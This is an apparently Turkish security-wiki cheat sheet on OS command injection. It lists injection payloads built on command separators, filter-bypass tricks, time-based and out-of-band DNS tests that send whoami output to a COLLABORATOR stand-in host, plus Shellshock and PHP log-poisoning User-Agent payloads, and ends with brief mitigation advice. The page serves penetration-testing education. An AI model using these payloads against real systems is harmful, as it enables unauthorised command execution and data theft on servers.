OS Command Injection
OS Command Injection Nedir?
OS Command Injection, bir saldırganın bir uygulamayı çalıştıran sunucuda işletim sistemi komutlarını yürütmesine olanak tanır.
Genellikle saldırgan, hosting altyapısının diğer bölümlerine saldırmak için bu zafiyetinden yararlanır ve saldırıyı kuruluş içindeki diğer sistemlere yayar.

Yöntemler
Ozel Karakterler ile Komut Eklemeye Çalışma
Aşağıdaki özel karakterleri parametrelerin sonuna eklemeyi deneyebiliriz.
&&whoami
&whoami
|whoami
||whoami
;whoami
"&&whoami"
%0awhoami
`whoami`
$(whoami)
0x0awhoami
\nwhoami
Blacklist Bypass
;w"h"o"am"i
;who$@ami
;who^ami
# Boşluk yasak ise IFS yerine geçer
;uname${IFS}-a
# Tab Karakteri de boşluk yerine geçer
;uname%09-a
# Boşluk olmadan
;{uname,-a}
# Noktalı virgün (;) yerine geçer
${LS_COLORS:10:1}whoami
# (/) yerine geçer
;ls ${PATH:0:1}
Timeout ile Injection
Eğer istek sonucu bir yanıt almıyorsak aşağıdaki payloadları deneyebiliriz. Eğer yanıt gecikmeli geliyorsa zafiyet olabilir.
;sleep 10
Çıktı Yönlendirme
Eğer zafiyet olduğunu biliyorsak ve komutun çıktısını okumak istiyorsak komutun çıktısını bir dosyaya yazabiliriz.
;whoami > /var/www/images/whoami.txt
DNS İsteği
Eğer yanıtta bir çıktı almıyorsak kendimize dns isteği atmayı deneyebiliriz.
;nslookup x.COLLABORATOR
;nslookup `whoami`.COLLABORATOR
Ping Atma
# Linux
;ping <IP> -c 5
tcpdump -i eth0 icmp
# Windows
;ping <IP> -n 5
Shellshock Useragent
User-Agent: () { :;}; whoami
PHP Log Poisoning
User-Agent: <?php system('whoami') ?>
Önlemler
Hiçbir zaman uygulama üzerinden işletim sistemi komutu çağrılmamalıdır. Bu tür işlemler için API kullanılarak işlemler yapılmalı.
Eğer kesin komut çağırmamız gerekiyorsa, girdi üzerinde whitelisting yapılmalı, örneğin sayı değilse isteği reddet gibi.
İşletim sistemindeki özel karakterler blackliste alınabilir fakat bu sağlıklı bir yöntem değildir saldırgan önlemi atlatmak için farklı yollar bulabilir.
Araçlar
Kaynaklar
Last updated
Was this helpful?